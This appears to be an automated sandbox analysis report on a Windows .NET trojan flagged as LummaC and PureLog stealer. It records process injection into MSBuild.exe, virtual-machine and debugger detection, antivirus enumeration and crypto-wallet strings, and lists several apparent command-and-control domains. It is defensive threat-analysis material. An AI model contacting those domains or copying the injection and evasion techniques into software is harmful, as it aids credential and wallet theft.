Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Protect544cd51a.dll

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe

File created: C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll

Jump to behavior

Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.91%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Virustotal: Detection: 65%
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	ReversingLabs: Detection: 78%

Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe

String found in binary or memory: <PrivateImplementationDetails>{8EF3A5DA-7205-4D2D-ADDE-8BA9F57E97B7}

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe

Static file information: File size 4779216 > 1048576

Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x439200

Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.Linq.2015\Release\System.Data.SQLite.Linq.pdb source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\Win32\Release\Protect32.pdb source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmp, SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.2011062969.00000000067E0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.2007261960.0000000005839000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.2007261960.00000000056B1000.00000004.00000800.00020000.00000000.sdmp, Protect544cd51a.dll.0.dr
Source:	Binary string: C:\TFS\tfs06.codeplex.com\PcapDotNet\PcapDotNet\src\PcapDotNet.Packets\obj\Release\PcapDotNet.Packets.pdb source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987803598.00000000044CB000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\x64\Release\Protect64.pdb source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.2007261960.00000000058F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.2007261960.000000000576B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.2011062969.000000000689A000.00000004.08000000.00040000.00000000.sdmp

Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe

Static PE information: 0xFEF4998A [Sun Jul 19 10:35:54 2105 UTC]

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe

Code function: 0_2_6CEAB6C0 GetModuleHandleW,GetModuleHandleW,LoadLibraryW,GetProcAddress,__cftoe,GetModuleHandleW,GetProcAddress,

0_2_6CEAB6C0

Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe

Static PE information: real checksum: 0x493c7f should be: 0x495591

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_6CEFCC2B push ecx; ret	0_2_6CEFCC3E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_6CEFD565 push ecx; ret	0_2_6CEFD578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00441354 push esp; iretd	2_2_0044135D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00440520 pushad ; retn 0044h	2_2_00440521
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00440598 push eax; retn 0044h	2_2_00440599
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_004408F5 push eax; retn 0044h	2_2_004408FD

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe

File created: C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll

Jump to dropped file

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe PID: 1048, type: MEMORYSTR

Query firmware table information (likely to detect VMs)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Memory allocated: 10E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Memory allocated: 2BE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Memory allocated: 29E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Memory allocated: 56B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Memory allocated: 66B0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll

Jump to dropped file

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe TID: 5252	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4428	Thread sleep time: -60000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: MSBuild.exe, 00000002.00000002.2115916035.0000000000FEF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWO
Source: MSBuild.exe, 00000002.00000002.2115916035.0000000000FEF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: MSBuild.exe, 00000002.00000002.2115916035.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW 1

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe

API call chain: ExitProcess graph end node

graph_0-51866

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 2_2_00438C50 LdrInitializeThunk,

2_2_00438C50

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe

Code function: 0_2_6CEF948B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_6CEF948B

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe

Code function: 0_2_6CEAB6C0 GetModuleHandleW,GetModuleHandleW,LoadLibraryW,GetProcAddress,__cftoe,GetModuleHandleW,GetProcAddress,

0_2_6CEAB6C0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_6CEF948B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_6CEF948B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Code function: 0_2_6CEFB144 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_6CEFB144

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987468881.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: roomabolishsnifftwk.shop
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987468881.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: civilianurinedtsraov.shop
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987468881.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: stalfbaclcalorieeis.shop
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987468881.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: employhabragaomlsp.shop
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987468881.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: femininiespywageg.shop
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987468881.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: averageaattractiionsl.shop
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987468881.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: buttockdecarderwiso.shop
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987468881.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: museumtespaceorsp.shop
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000002.1987468881.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: slamcopynammeks.shop

Writes to foreign memory regions

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43D000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 440000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 453000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: DCE008	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe

Code function: 0_2_6CEF84B0 cpuid

0_2_6CEF84B0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe

Code function: 0_2_6CEFA25A GetSystemTimeAsFileTime,__aulldiv,

0_2_6CEFA25A

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 5316, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, type: SAMPLE
Source: Yara match	File source: 0.0.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.3f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1979414026.00000000003F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY

Found many strings related to Crypto-Wallets (likely being stolen)

Source: MSBuild.exe, 00000002.00000002.2115916035.0000000000FEF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum
